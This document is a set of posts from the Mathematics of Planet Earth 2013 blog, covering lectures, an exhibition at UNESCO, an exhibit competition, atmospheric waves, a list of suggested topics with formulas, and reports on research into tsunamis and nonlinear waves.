
    A network of GPS stations measuring minute displacements in a region of Central Mexico
    Reconstructed vertical displacements in mm (work in progress). The green circles correspond to the GPS stations.

So will geophysicists some day be able to predict seismic events? Unfortunately, earthquake prediction may never be as reliable as, say, weather prediction. At best, we will some day be better at assessing the probability that a given region may suffer an earthquake in the next 100 years. That said, knowing the precise geometry of faults, together with a profile of stresses in a given area, may be helpful in predicting the magnitude and the waveform of future seismic events.

    Darko Volkov
    Associate Professor
    Worcester Polytechnic Institute
    USA

    Posted in Geophysics | Leave a comment

    Lecture: Utilizing the environment to manage HIV/AIDS

    Edward M. Lungu, Department of Mathematics, University of Botswana

    About the Speaker:
Edward Lungu is a professor of mathematics at the University of Botswana in Gaborone, Botswana. He got his first degree in 1975 from the University of Zambia and then went to the University of Bristol, where he got a Master’s degree and a Ph.D. in 1980. Edward Lungu has been described as a “fundamental person” in the development of teaching and research in applied mathematics in Southern Africa. As founder and leader of the Southern Africa Mathematical Sciences Association (SAMSA) and later of AMMSI (the Millennium Initiative), he has simply done everything that one person could do: organized, encouraged, supervised, and led by his personal example in teaching and research. For Botswana itself, Edward Lungu has developed models in hydrology (Botswana relies on storing rainfall), ecology (domestic livestock as well as wildlife are keys to the economy), and epidemiology (to understand the progression of HIV/AIDS and how to help the victims). His recent series of papers in the mathematical biosciences models the differential progression of HIV/AIDS based on characteristics of patients and the care they receive. In developing mathematical education and research, Edward Lungu has been described as a “giant force”: a force with organizational talent, tireless energy, and a friendly personality. In 2011 he was awarded the Su Buchin Prize of the International Council for Industrial and Applied Mathematics (ICIAM), which recognizes an outstanding contribution by an individual in the application of mathematics to emerging economies and human development, in particular at the economic and cultural level in developing countries.

    Abstract:
    Sub-Sahara Africa is the epicentre for both the HIV epidemic and poverty. In this presentation, we define poverty in terms of lack of clean water, energy and food. Sub-Sahara Africa can boast of abundant surface water, underground water, good soils, good climate and adequate rainfall in most parts of the region. How have these resources been utilized to improve the quality of life, especially for HIV infected people?
    Management of HIV/AIDS requires clean water, a highly nutritious diet and availability of energy for domestic use. In this region, water, food, energy and HIV/AIDS have formed a vicious cycle which is reducing the benefits that can be realized from HIV treatment drugs.
Most countries in sub-Sahara Africa rely on wood to meet energy needs. Woodfuels constitute up to 80% of African primary energy needs and account for almost 90% to 98% of residential energy consumption in most of rural sub-Sahara Africa. Due to deforestation, wood must now be fetched from long distances away from human settlements. Rural electrification has only reached a few villages close to national electricity grids. In homes where adults are living with HIV/AIDS, collecting the vital energy source, firewood, is a responsibility that has been passed on to the school-going children. This task, although not intended to abuse the children, has led some rural children to abandon their education in order to look after their ailing parents/guardians, and some still in the school system may not have performed to their potential as a result.
    Most parts of sub-Sahara Africa have plenty of surface water from rivers, streams and ground water aquifers. However, underinvestment in water resources has meant that there is no piped water in most rural areas. This has adversely affected families with parents/guardians living with HIV/AIDS, as the children have taken on the responsibility of fetching water, a task that takes up a lot of their time as they have to walk long distances to the community borehole.
Malnutrition and HIV/AIDS are closely linked disorders; both can cause or contribute to severe immune suppression. In rural sub-Sahara Africa, where agriculture is the mainstay, HIV-related illnesses have incapacitated many adults, who through illness have left their crop fields unattended, resulting in shortages of food and income for their families. Lack of income has affected the welfare of many children, who have had to abandon their education.
What must sub-Sahara Africa do to take advantage of its abundance of water, solar energy and arable land? Surface and underground water, if utilized properly, can transform the agricultural sector, which in turn will provide a balanced diet to the communities, especially to HIV-infected individuals whose immune systems are already compromised. To pump and supply clean water, a constant supply of energy is required. In sub-Sahara Africa, governments tend to think of big projects such as hydro or thermal electricity, and yet energy can be generated from the abundant sunshine throughout the year. This can be done from rooftops to provide electricity for households, which could then sell the surplus to the central electricity grid for use by institutions such as schools and hospitals.
In this presentation, we suggest ways in which communities can reduce deforestation, protect the fertile arable soils, and in the process contribute to the well-being of citizens, especially people living with HIV/AIDS. Governments are already developing boreholes to extract underground water for rural communities. This presentation looks at how solar energy can be used to pump water to rural households and in turn help families with ailing parents/guardians to free their children from daily chores to concentrate on their education.
We ask the questions: “Can the hydrology, hydrogeology, land and solar energy be the answer to better treatment of HIV/AIDS? Have the higher educational institutions argued the case for solar technology through research? What educational programs must be put in place in order to take full advantage of solar devices? What is the best strategy for protecting sub-Sahara African children?”

    Posted in General, Public Event | Leave a comment

    A non-mathematician’s impressions of the Shuckburgh lecture

On Monday, March 4, Emily Shuckburgh delivered the second talk in the MPE2013-Simons Public Lecture Series, “Climate disruption: what math and science have to say,” at the Palace of Fine Arts in San Francisco. Nearly 800 people attended the sold-out lecture, a nice mix of mathematicians and members of the general public.

    Here are the reflections of one of the attendees, Alison Hawkes, a freelance reporter based in San Francisco, and also the online editor of BayNature.

    “What I learned most from Emily Shuckburgh’s talk was her approach towards meshing field observations with mathematical models on climate change, and how the two combined can create a more robust set of predictions about the Earth’s future. So often you hear about the recent results from the field in some new study, but understanding more how that gets fed into the underlying math and physics of the world’s climate system is fascinating.

    She also presented some, quite frankly, frightening graphs of the Earth’s future under differing scenarios of greenhouse gas emissions. The graphs show, like nothing else, what a stark choice we have to make about living with the outcomes of our collective decision on what we do about climate change. And Shuckburgh’s portrayal of the timeline of these outcomes — a child born today will live in this future — really drove the point home that this isn’t just an academic debate, rather there is an enormous human dimension that we can measure in the lives of our children and grandchildren.”

    Posted in Climate, General, Public Event | Leave a comment

    SISC Special Issue

    In recognition of Mathematics of Planet Earth 2013, the SIAM Journal on Scientific Computing (SISC) has dedicated a special issue to Planet Earth and Big Data, bringing together two major scientific themes. SISC traditionally publishes papers on a wide variety of computational aspects of related research, including geosciences, atmospheric and oceanic fluid dynamics, methods for inverse problems, flow through porous media, detection and tracking of pollutants, computational astrophysics, and much more. This issue will highlight the role computational mathematics has in these important applications. Click here for details.

    Posted in General | Leave a comment

    Impressions from the First MPE Exhibition at UNESCO in Paris

The mounting of the first MPE exhibition at the UNESCO Headquarters in Paris involved two teams, one around Michel Darche and Regis Goiffon from Centre Sciences and the other around me from Oberwolfach and IMAGINARY. While Michel and Regis developed ten physical exhibits from the collection of Centre Sciences, we were in charge of the ten MPE competition modules selected for display, mainly interactive exhibits with computer programs and some pictures and films.

    We arrived in Paris on Saturday, March 2, to drop the equipment off at the main UNESCO building. The actual mounting of the exhibit started on Monday morning, March 4. A typical module consisted of a touch screen on a stand connected to a computer and a text board with explanation. Some modules were film stations or had several physical components, like a globe, extra images and some tools to measure angles and distances. We printed high-quality images of the Lorenz Attractor and the Quasicrystalline Wickerwork and displayed them in a small gallery. The films were put into a loop and shown on a touch screen, with two big sofas for viewing.

    For many stations, the authors had prepared further reading material or an activity book, which we placed next to the exhibit.

On March 5, at 9:00 am, the first visitors started to explore the 20 modules of the exhibition. It was great that many authors of the competition modules came to Paris, not only the winners. The winners of the first, second and third prizes were announced officially in the morning session of the MPE Day conference. Ehrhard Behrends, head of the jury, gave a brief overview of the modules and presented the authors with their award certificates. Daniel Ramos, author of the winning module “The Sphere of the Earth,” gave an introduction to his module.

    After the lunch break, the exhibition was opened to the public. Many of the approximately 250 visitors played with the exhibits and listened to the explanations by the authors of the modules. Here are some pictures of the opening and the exhibition.

    MPE Day at UNESCO, Paris

As I am writing this blog post, I am sitting in another UNESCO building, which is located just next to the main one and hosts all the UNESCO embassy offices. We changed the site of the exhibition this morning and mounted everything here again, where it will stay until Friday, March 8, and attract a broader audience. Right now a group of children, ages 5-12, is here; they all know “GPS” from their parents’ cars and are being guided by Regis through the physical GPS exhibit.

    If you are interested in seeing more details about the MPE exhibits, or if you want to download the images or programs – please, go to the Exhibition Web site. On the same Web site you can also contribute your own ideas and suggestions. We are planning to extend the exhibition and show it in many places around the world.

    All the best from Paris,
    Andreas

    Posted in MPE Exhibit, Public Event | 4 Comments

    News from the MPE2013 Competition

    Contributed by Ehrhard Behrends (Free University, Berlin, Germany)

    The competition for modules for a virtual exhibition started in January 2012. Here is the text of the announcement:

    “You are invited to prepare museum exhibits in different formats — images, films, programmes — or to design physical exhibits, and submit them for the competition. The best modules will be awarded and shown by our partner museums in 2013.”

    The winning entries would receive a monetary award:
    First prize: US\$ 5,000
    Second prize: US\$ 3,000
    Third prize: US\$ 2,000

    The announcement was complemented by a detailed description of the desired format of the submitted modules: author’s license, technical description etc.

    Twenty-nine entries were submitted for the competition. Most of them came from Europe, but there were also submissions from North America, India and the Philippines.

    The following aspects were considered as important when judging the submissions:

    * Is there an interesting mathematical content?
* Does the module have MPE relevance?
    * Is it engaging?
    * Is the contribution original?
    * Is the level appropriate to the public?
    * Could one present it without major modifications?
    * Is it easy to use for the visitors?

The members of the jury were Tom Banchoff (USA; author of the “Flatland” books), Ehrhard Behrends (Germany; chair of the committee for “raising the public awareness of mathematics” of the European Mathematical Society), Ana Eiró (former director of the Science Museum in Lisbon, Portugal), George Hart (USA; working in “art and mathematics”, one of the curators of MoMath in New York), Oh Nam Kwon (Korea; very active in the popularization of mathematics in Korea), and Adrian Paenza (Argentina; known in the Spanish-speaking world for his popular mathematical books and his TV performances).

    The jury met in early January in Providence (USA) to

    I. Select the winners of the first, second, and third prize;
    II. Recommend the modules to be shown at the exhibitions in Paris and in museums in connection with MPE2013; and
    III. Make further recommendations for the virtual exhibition.

    Following are the three entries selected by the jury for the prizes, with their citations:

Third prize: “How to predict the future of glaciers?”, by the team of Guillaume Jouvet (France/Switzerland/Germany)

    “In an entertaining way, this video illustrates the collaboration between a mathematician and a glacier expert as they develop a dynamic model for the evolution of glaciers. At the end of the video, the user can choose among alternative scenarios to see possible futures for the Aletsch glacier in the Alps.”

    Second prize: “Dune Ash”, by the team of Tobias Malkmus (Germany)

    “This interactive computer program graphically simulates the dispersion of a volcanic ash cloud using a mathematical model. The user chooses the location of the volcano, sketches the direction and strength of the winds, and sets the rate of dispersion. An original interface allows the user to specify complex wind patterns and invites repeated exploration.”

    First prize: “Sphere of the Earth”, by the team of Daniel Ramos (Spain)

    “This exhibit shows that maps of the spherical surface of the earth on a flat plane must have distortions. The user interactively selects a disc region and sees how various maps distort it. The engaging and easy-to-use interface effectively conveys mathematical ideas relevant to the earth.”

The prize ceremony took place at the UNESCO Headquarters in Paris on the morning of March 5.

    Posted in MPE Exhibit | Leave a comment

    European Launch of MPE2013 – UNESCO, Paris, March 5, 2013

Today, Europe celebrates an exceptional event for mathematics. Our concern today is presenting to scientists and to society at large one of the most valuable heritages of human knowledge: mathematics. And this is happening not only at the UNESCO headquarters in Paris, but also simultaneously in many other countries across Europe.

    The fantastic idea to create Mathematics of Planet Earth 2013 (MPE2013), the support of the International Mathematical Union (IMU), and the involvement of UNESCO, together make possible the opening of this exciting event.

    The inaugural fireworks will be followed by a tremendous number of activities organized in the framework of MPE2013 throughout the year. These include not only conferences, workshops, lectures, exhibitions, articles in journals and magazines, and books, but also contributions to blogs by fans of mathematics, posts on Facebook, tweets, and many other spontaneous contributions.

    The European Mathematical Society (EMS) is very proud to count itself among the very many partners of MPE2013, and to have helped generate enthusiasm for the initiative through its more than 90 corporate members. Some long-term scientific programmes taking place in ERCOM Centres–the EMS network of mathematical research centres in Europe–are devoted to topics inspired by MPE2013. Others host specific activities of MPE2013, like schools or public lectures. The EMS is also contributing its experience and expertise through its committee Raising Public Awareness of Mathematics.

This is not the first time that UNESCO has given its explicit support to international endeavors to highlight the central importance of the mathematical sciences and their applications. In the year 2000, UNESCO endorsed the IMU’s initiative World Mathematical Year 2000 (WMY2000). Under this banner, mathematicians across the planet contributed to increasing public awareness of mathematics, to showcasing mathematics as a key for progress and development, and to discussing the challenges of the new century.

The tremendous success of WMY2000 proved the capacity of the mathematical community to cooperate in large-scale initiatives of utmost importance for the development of its discipline. This may have come as a surprise even within mathematical circles. In contrast with other scientific fields, mathematical organizational units are quite small, and the social attitude of mathematicians is sometimes misperceived as introverted.

Thirteen years later, and partly thanks to the beneficial results of WMY2000, the new initiative MPE2013 starts a long journey in a community with more scientific and social leverage than it enjoyed in the year 2000. Today, mathematicians are in an even better position to exhibit once more their capacity for coordination in reaching objectives that require strong efforts. Thus, I am fully confident that this very ambitious project will be an undeniable success.

Why Mathematics of Planet Earth?

    By being the driving force behind modern science, mathematics is the natural partner in multidisciplinary teams devoted to exploring, approaching and tackling global issues, which often crucially require mathematical and computational thinking, and mathematical modelling.

Some of these complex issues are pressing problems for the planet, like natural disasters and catastrophes, financial crises, food security, and pandemic diseases. Others are related to development and progress, like setting up the conditions to build inclusive, innovative and secure societies, achieving cooperation among diverse communities, managing networks, preserving ecosystems, and developing and enhancing vital communications.

The initiative MPE2013 was conceived with the objective of providing a worldwide showcase for the contributions made by the mathematical sciences to global problems. This objective is being enriched and complemented by other activities, less visible to the wider public, consisting solely of knowledge generation, of building theories. There is a necessity to value and to highlight this crucial aspect of mathematical activity too. Let us recall Leonardo da Vinci’s statement: “Practice must always be built upon good theory.”

Public awareness of mathematics should not be confined to the practical results of mathematical activity; it should also extend to striking theories, to the intricate mental process of mathematical creation and the conditions for its best development, and to its value for human culture. Mathematics is all that.

I began this contribution to the blog by describing the MPE2013 initiative as a presentation of mathematics to the public. It is even more than this. MPE2013 is also a manifesto on the commitment of mathematics to society.

    Marta Sanz-Solé, President
    European Mathematical Society

    Posted in General, Public Event | Leave a comment

    Quel climat pour demain ? L’apport des modèles

by Sylvie Joussaume, Research Director at CNRS, Institut Pierre-Simon Laplace

Kafemath at “La Coulée Douce,” 51 rue du Sahel, Paris 12ème
Thursday, March 14, 2013, at 8:00 pm.

Author’s abstract (the talk will be given in French): “Observations show a global warming of the climate and an increase in the concentration of greenhouse gases in the atmosphere. To interpret these observations and to study how the climate could evolve in the future as a function of human activities, climate models have been developed that are capable of representing the workings of the atmosphere-land-ocean climate system. These models rest on the basic principles of physics and use numerical methods from mathematics. Beyond the uncertainties tied to the models themselves and to the variability of the climate, the models agree in predicting continued warming and a determining role of human activities in the climate changes already observed. This warming will, however, depend strongly on societal choices, notably in matters of energy.”

    Posted in Climate Modeling | Leave a comment

    Atmospheric waves and the organization of tropical weather

    Though waves of one sort or another are a ubiquitous part of our daily experience (think of the light from your screen or the sound from your kids in the other room), we have to get on with our lives, and therefore tend not to think of the wavelike nature of daily phenomena. Those fortunate among us who can escape to the shore on a hot August week can then take the time to observe the sea and the waves she sends us.

Sitting by the shore we watch these waves rise, as if out of nothing, break, and then crash on the beach. We see a slow, nearly periodic pattern in the swell punctuated by a burst of white water. In fact, for most of us, the word “wave” evokes exactly this wave: the oceanic, shallow-water, surface gravity wave. Among all waves, it is in this phenomenon that we are able to observe (in fact, experience) most of the properties of a wave. We see its wavelength, its crest and its trough, and we can hear its period by listening to the breakers.

    However, what we often do not see is the origin of the wave. Far out in the ocean, storms generate strong winds which raise and depress the ocean surface, thereby generating waves. As surfers are well aware, these waves travel thousands of kilometers and ultimately release their energy on the coastlines. What we do see, but may not realize, is that the breaking of the wave ultimately releases the wave energy in a manner that cannot be re-injected into the wave. It splashes, sprays and erodes the shoreline, thereby dissipating its energy. Furthermore, the wave height, itself, changes as the wave enters shallower water – which is why, from the shore, waves appear to grow from the ocean as if from nothing.

Imagine standing at the eastern edge of a California bay and staring west at the Pacific Ocean as waves from tropical storms are rounding the point at the southern end of the bay. If we want to calculate the coastal erosion associated with these waves, we need only know some aggregate properties of the waves: wavelength, height and average frequency of occurrence should suffice. However, if we want to determine the best surfing times, we need to know the timing of a particular tropical storm and its energy – thereby knowing the properties of the waves it produces and what time to be on the water in order to catch them. If storm systems appear in the North Pacific at the same time as tropical Pacific storms, then the waves from both systems will interact and break in a wholly different manner on the California coast than if the storm systems had not coincided.

The atmosphere contains waves which are very similar to the oceanic gravity wave. They are called “internal gravity waves” because they occur throughout the depth of the weather layer of the atmosphere, not just at its upper surface. We experience these waves as pressure and wind undulations with very low frequencies – the wind blows from the east one day, from the west the next day, and from the east again the following day. Gravity waves exist on a wide variety of wavelengths, from meters to kilometers to thousands of kilometers. In the grossest sense, they are all generated in the same manner: something pushes the air up.

The most interesting phenomena that push the air up are thunderstorms – also known as atmospheric convection. Moist air is lifted to a height where the air is colder and the water begins to condense, releasing its latent heat and forming a cloud. This is the opposite of what occurs in a humidifier, where water is heated in order to evaporate it and moisten the air. In the atmosphere, as the heat is released the air warms and becomes less dense than its surroundings, thereby rising into a cooler environment and condensing even more. Under the right conditions, this becomes a runaway process whereby the condensation continues and the cloud rises until it hits the top of the weather layer, the tropopause. As the air rises and the thunderstorm forms, ambient air is sucked into the bottom of the cloud while the top of the cloud pushes air away from it. This process is highly agitating to the atmosphere and generates a gravity wave. It is not unlike a pebble falling into a pond and generating a surface water gravity wave.

    However, the atmospheric gravity wave differs from the surface water wave in a very crucial way. As the wave travels away from the thunderstorm which generated it, it raises moist air, thereby cooling it and initiating condensation and, possibly, another thunderstorm. Thunderstorm cells cluster around one another so that, in the words of Brian Mapes, convection tends to be gregarious.

    Just as the gravity waves occur on many length scales, so too does this organization. On the largest scales, thunderstorm systems over the Indian Ocean generate gravity waves with six thousand kilometers longitudinal extent. These are called equatorial Kelvin waves and they travel eastward along the equator for twenty thousand kilometers until they hit the Andes of South America. Along the way they excite thunderstorm activity along the whole equatorial Pacific Ocean.

    From time to time, these Kelvin waves encounter other kinds of waves (Rossby waves) coming from the North Pacific and when they do, warm, moist, tropical Pacific air is channeled toward the western United States. In turn, this air sends storms and rain across the North American continent. So, in order to predict weather over the U.S. we have to carefully observe what is happening over Alaska and the Indian Ocean several days prior.

    Kelvin waves move fast, and computer simulations of climate have yet to accurately simulate them. Just as understanding coastal erosion does not require detailed knowledge of the timing of surface waves, simply their aggregate properties, so too, predictions of climate change are not affected by the details of atmospheric waves, since we have a good understanding of their average properties.

But surfers need to know the timing of the waves – both from north and south. So too, in order to improve weather forecasts and to understand how climate change will modify weather, we must understand atmospheric waves. How often do tropical Kelvin and North Pacific Rossby waves coincide? Under what conditions will they interact to cause storm systems? How do these waves interact with the ocean and thereby change the moisture of the air in which they travel? Least understood of all, what will happen to these wave interactions as our climate changes? Just as there is energy in the ocean surface waves that must be deposited on some coastline, so too there is energy in moist tropical air that must be released somewhere in the form of rain; somewhere other than where it is being released now. This means that the pattern of rains will change for the whole Pacific basin, which is all the more concerning for places like California.

    Joseph Biello
    Department of Mathematics
    UC Davis

    Posted in Atmosphere, Meteorology, Ocean | 2 Comments

    mpe2013.org

    MPE2013 Web Site

    Posted in General | Leave a comment

    What is an MPE topic?

    MPE2013 continues to spread among schools, science centers and universities. Many people are enthusiastic and eager to organize MPE activities. But what is an MPE topic?

    Many people associate mathematics with symmetries, for example in nature or in architecture. But these are not really MPE topics. In this blog I will do some brainstorming, with the expectation that we will all have a better idea of what are appropriate topics for MPE2013.

    First, let us list a number of potential topics. You have probably already heard of the four sub-themes of MPE2013:

    A planet to discover
    A planet supporting life
    A planet organized by humans
    A planet in danger

    When it comes to explaining the mathematics behind these topics at the elementary level, the first sub-theme immediately suggests a whole range of topics. In this blog, I will list thirteen topics, and I will come back with topics for the other sub-themes in a later blog.

    (1) Fractals.
    Fractals provide models for the shapes of nature: rocky coasts, ferns, the networks of brooks and rivers (think of river deltas). The fractal dimension is a measure of the “density” of a fractal, which allows us to compare fractals.
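
One formula that could accompany this topic (standard, and included here only as an illustration): a self-similar fractal built from $N$ copies of itself, each scaled down by a factor $r$, has similarity dimension $D = \log N / \log(1/r)$. For the Koch curve, $N = 4$ and $r = 1/3$, so $D = \log 4 / \log 3 \approx 1.26$: more than a smooth curve, less than a filled surface, which is what makes such sets reasonable caricatures of rocky coastlines.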

    (2) Solar system
The inner planets (Mercury, Venus, Earth and Mars) have chaotic motions. Simulations show a 1% chance that Mercury’s orbit destabilizes and that Mercury collides with the Sun or Venus. There is a much smaller chance that all the inner planets destabilize and that the Earth collides with either Venus or Mars in ~3.3 Gyr (Jacques Laskar, 2009).

    (3) The Moon stabilizes the Earth
    The Moon stabilizes the rotation axis of the Earth. Jacques Laskar’s simulations (1994) showed that if we removed the Moon, then the Earth’s axis would undergo large oscillations and we would not experience the climates that we now have.

    (4) Why seasons?
    This theme is standard but, in many countries, it has disappeared from basic science education and needs to be taught independently. What is the mathematical definition of the Polar circles and the Tropics? Can we find a formula to compute the length of the day at different dates depending on the latitude? Or a formula to compute the angle of the Sun at noon at different latitudes and different dates?
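
One possible answer to the day-length question, quoted here as an illustration (the standard spherical-astronomy formula, ignoring refraction and the finite size of the Sun): if $\phi$ is the latitude and $\delta$ the Sun’s declination on the date in question, the hour angle of sunrise $H_0$ satisfies $\cos H_0 = -\tan\phi \tan\delta$, and the length of the day is $T = (24/\pi) H_0$ hours (with $H_0$ in radians). The polar circles are the latitudes beyond which $|\tan\phi\tan\delta|$ exceeds 1 at the solstices ($\delta \approx \pm 23.4^\circ$), so that the Sun does not rise or does not set; the tropics are the latitudes $\pm 23.4^\circ$ where the Sun can be directly overhead at noon. The altitude of the Sun at noon is $90^\circ - |\phi - \delta|$, which answers the last question.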

    (5) Eclipses
There are two types of eclipses: solar eclipses and lunar eclipses. Explanation of the phenomenon; prediction of eclipses.

    (6) Weather prediction
    The use of models. The butterfly effect and sensitivity to initial conditions.  

    (7) Exploring Earth through remote sensing
The use of aerial photographs to discover resources, or the use of seismic waves for analyzing the inner structure of the Earth and discovering underground resources. For instance, in 1936, the Danish mathematician and seismologist Inge Lehmann discovered the solid inner core of the Earth by studying the anomalies in the paths of the seismic waves of large earthquakes recorded at stations around the world.

    (8) Localizing events
Localizing events like earthquakes and thunderstorms is done through triangulation, where several distant stations note the time when they register the event. It provides an interesting application of the hyperbola: indeed, knowing the difference between the arrival times of a signal at two different stations allows us to locate the origin of the signal on a branch of a hyperbola.
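
A toy numerical version of this idea (all speeds and coordinates invented for the sketch, not data from any real network) recovers a source location from arrival-time differences at three stations by nonlinear least squares:

import numpy as np
from scipy.optimize import least_squares

c = 5.0  # assumed signal speed, km/s (e.g., a seismic P-wave); purely illustrative
stations = np.array([[0.0, 0.0], [60.0, 0.0], [0.0, 80.0]])  # station coordinates, km
source_true = np.array([25.0, 40.0])

# Synthetic arrival-time differences relative to station 0 (this plays the role of the data)
dist = np.linalg.norm(stations - source_true, axis=1)
tdoa = (dist - dist[0]) / c

def residuals(p):
    # Each time difference constrains the source to one branch of a hyperbola
    d = np.linalg.norm(stations - p, axis=1)
    return (d - d[0]) / c - tdoa

fit = least_squares(residuals, x0=np.array([10.0, 10.0]))
print("estimated source location (km):", fit.x)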

    (9) Global Positioning System (GPS)
    The receiver measures its distance to satellites with known positions. From this data, the receiver deduces that it is located on spheres centered at the satellites. Knowing the distance from three satellites allows locating the receiver. Applications include measuring the height of mountains like Everest and Mont Blanc and evaluating their growth, and also measuring the movements of tectonic plates.
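
In the idealized setting described above (perfect clocks and exactly three satellites), the receiver position $(x,y,z)$ satisfies $(x-x_i)^2 + (y-y_i)^2 + (z-z_i)^2 = \rho_i^2$ for $i = 1, 2, 3$, where $(x_i,y_i,z_i)$ are the known satellite positions and $\rho_i$ the measured distances. Subtracting one equation from the other two removes the quadratic terms and leaves a small linear system together with one of the original sphere equations. In a real GPS receiver the clock offset is a fourth unknown, which is why at least four satellites are used in practice.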

    (10) Cartography
It is not possible to draw a flat map of the Earth that respects ratios of distances. Any mapping process is a compromise. The Lambert equivalent projection preserves ratios of areas. The Mercator projection preserves angles. The loxodromes on the sphere are the curves that make a constant angle with the meridians.
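
For concreteness, the Mercator projection sends the point with longitude $\lambda$ and latitude $\phi$ to $x = R\lambda$, $y = R \ln\tan(\pi/4 + \phi/2)$. This is (up to scale) the unique cylindrical projection that preserves angles, and it maps loxodromes to straight lines, which is what made it so valuable for navigation.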

    (11) Measuring the Earth
    The use of tools in geography to measure the Earth: instruments to measure angles like the sextant, the heliotrope (invented by Gauss), etc. How do we measure the height of a mountain? How do we draw maps of a region?

    (12) Tectonic plates and continental drift
Mathematicians study the dynamics of the planet’s mantle as an application of mathematics to the geosciences. The mantle is viscous, which allows for continental drift. The small movement of each tectonic plate is a rotation around an axis through the center of the Earth, passing through the Euler poles of the plate.

    (13) Earth’s rotation
    Why do earthquakes and tsunamis change the speed of rotation of the Earth? During earthquakes and tsunamis, the mass distribution in Earth’s crust changes. This changes the moment of inertia of the Earth, which is the sum of the moments of inertia of each point. The moment of inertia of one point mass is the product of its mass by the square of its distance to the axis of rotation. Meanwhile the angular momentum is preserved. Hence if the moment of inertia of the Earth decreases (increases), the angular velocity of the Earth increases (decreases). The beauty of physics lies in the ability of simple principles, like conservation of angular momentum, to explain disparate phenomena such as Earth’s changing rotation rate, figure skaters spinning, balancing moving bicycles, spinning tops, and gyroscopic compasses. The major earthquakes in Chile (2010) and Japan (2011) increased the Earth’s speed of rotation and hence decreased the length of the day. These earthquakes have also moved the Earth figure axis, which is the axis about which the Earth’s mass is balanced.
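
A one-line calculation makes the argument quantitative. With the angular momentum $L = I\omega$ conserved, the length of the day $T = 2\pi/\omega = 2\pi I/L$ satisfies $\Delta T/T = \Delta I/I$ to first order. Since the Earth’s moment of inertia is about $8 \times 10^{37}\ \mathrm{kg\,m^2}$, even the enormous mass redistribution of a great earthquake changes $I$ by only a tiny relative amount, which is why the reported changes in the length of the day are measured in microseconds.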

    Posted in General | Leave a comment

    Quel climat pour demain ? L’apport des modèles.

    Par Sylvie Joussaume, directrice de Recherche au CNRS, Institut Pierre-Simon Laplace.

    Kafemath à “La Coulée Douce”, 51 rue du Sahel, jeudi 14 mars 2013 à 20 heures.

    Résumé d’auteur:”Les observations mettent en évidence un réchauffement global du climat et une augmentation de la concentration en gaz à effet de serre dans l’atmosphère. Afin d’interpréter ces observations et d’étudier comment le climat pourrait évoluer dans l’avenir en fonction des activités humaines, on a développé des modèles de climat capables de représenter le fonctionnement du système climatique atmosphère-terre-océans. Ces modèles s’appuient sur les principes de base de la physique et utilisent des méthodes numériques des mathématiques. Au-delà d’incertitudes liées aux modèles eux-mêmes et à la variabilité du climat, les modèles s’accordent à prévoir une poursuite du réchauffement et un rôle déterminant des activités humaines dans les modifications du climat déjà observées. Ce réchauffement dépendra cependant fortement des choix de société, notamment en matière énergétique.”

    Posted in General @fr | Leave a comment

    Letting a Thousand MPEs Bloom

MPE2013 is a success. It has generated enthusiasm all over the world, and it is giving mathematics more visibility than we could have hoped for. The fact that over 120 organizations in many countries have joined MPE2013 as partners is an indication that we have hit a resonance.

As a life-long applied mathematician, I am of course very pleased with this outcome. I have often wondered how we can make applied mathematics more visible and present our discipline as an invaluable component of the scientific enterprise. Applied mathematics lacks the glamour that core mathematics generates with its “open problems.” Think of the four-color problem, Fermat’s last theorem, the Poincaré conjecture: all rather abstruse concepts, but they made the news in a big way. Would anything like that ever happen to geometric singular perturbation theory, or homogenization? I doubt it. Yet, applied mathematics provides the infrastructure for science, engineering, and the life sciences. The trouble is: infrastructure is mostly invisible.

    But MPE2013 has hit a chord. It has caught the attention of a wider audience, it has a catchy sound to it and could give us a handle to better advertise our stuff. So I have a suggestion. We adopt the MPE brand, trademark it and exploit it to present applied mathematics as a partner in society’s quest for a sustainable future. Anyone who is working at the interface of mathematics and Planet Earth is welcome to use the brand name, and soon we will see a thousand MPEs bloom.

    TM

    Posted in General | Leave a comment

    Nonlinear Waves and the Growth of a Tsunami

This past week at AIM, Mark Ablowitz told me about an interesting article (with beautiful pictures) he wrote with Douglas Baldwin called “Nonlinear shallow ocean-wave soliton interactions on flat beaches.” The propagation of these waves may contribute to the growth of tsunami waves.

The article appears in the journal Physical Review E (vol. 86), but it has also gained a lot of media attention and was written up as a synopsis on the American Physical Society (APS) web site. There are some nice videos that one can see from the link.

It was subsequently identified as a special focus article in the November issue of Physics Today. It was also featured in the Bulletin of the American Meteorological Society (January 2013) and then in other science news outlets: OurAmazingPlanet, New Scientist, NRC Handelsblad (the largest evening newspaper in the Netherlands), NBC.com, the U.S. National Tsunami Hazard Mitigation Program, and others.

    As reported in the synopsis, “Previously, the assumption was that these interactions are rare. However, the authors have observed thousands of X and Y waves shortly before and after low tide at two flat beaches, where water depths were less than about 20 centimeters. The researchers showed that the shallow waves could be accurately described by a two-dimensional nonlinear wave equation.”

    Estelle Basor
    AIM

    Posted in Geophysics, Ocean | 2 Comments

    Report from AIM: “Nonlinear wave equations and integrable systems – Mathematics for a nonlinear planet”

    Prepared by Gino Biondini and Barbara Prinari

    A small research group has been meeting at the American Institute of Mathematics (AIM) in Palo Alto, CA, during the week of Feb. 18-22 to work on integrable systems of nonlinear Schroedinger type, a special class of nonlinear partial differential equations (PDEs).

Nonlinear Schroedinger (NLS) equations are the simplest models that describe the evolution of weakly nonlinear dispersive wave trains. As such, they have been studied as models for many important natural phenomena, such as deep water waves, ion-acoustic waves in plasmas, and propagation of laser pulses in optical fibers. Indeed, the NLS equation has provided an invaluable tool for the study of optical fiber telecommunication systems over the last forty years. An emerging application that has also attracted great scientific attention in the last 10 years is related to Bose-Einstein condensates (BECs). A BEC is a state of matter of a dilute gas of boson atoms cooled to temperatures very close to absolute zero. Under such conditions, a large fraction of the atoms occupy the lowest quantum state and quantum effects become evident even on a macroscopic scale. The state of the BEC is then described by the wavefunction of the condensate as a whole, which obeys a nonlinear equation known as the Gross-Pitaevskii equation. The existence of BECs was theorized in the 1920s by Bose and Einstein, but only observed experimentally in 1995. Since then, the field has exploded. In a one-dimensional approximation (cigar-shaped traps), the model equation is then precisely the NLS equation. Recent studies also suggest that nonlinear solitary wave interactions described by the Kadomtsev-Petviashvili equation (another integrable system) could help to explain the generation of localized large amplitude waves such as those generated by the interaction of two wave stems in the 2011 Tohoku tsunami in Japan.
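
For readers who want to see the equation itself, one common normalization of the focusing NLS equation (conventions differ by rescalings of $x$, $t$ and $q$) is $i q_t + q_{xx} + 2|q|^2 q = 0$, and direct substitution shows that $q(x,t) = a\,\mathrm{sech}(a x)\, e^{i a^2 t}$ is an exact one-soliton solution for every amplitude $a$: the nonlinearity exactly balances dispersion, which is the kind of structure that integrability makes systematic.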

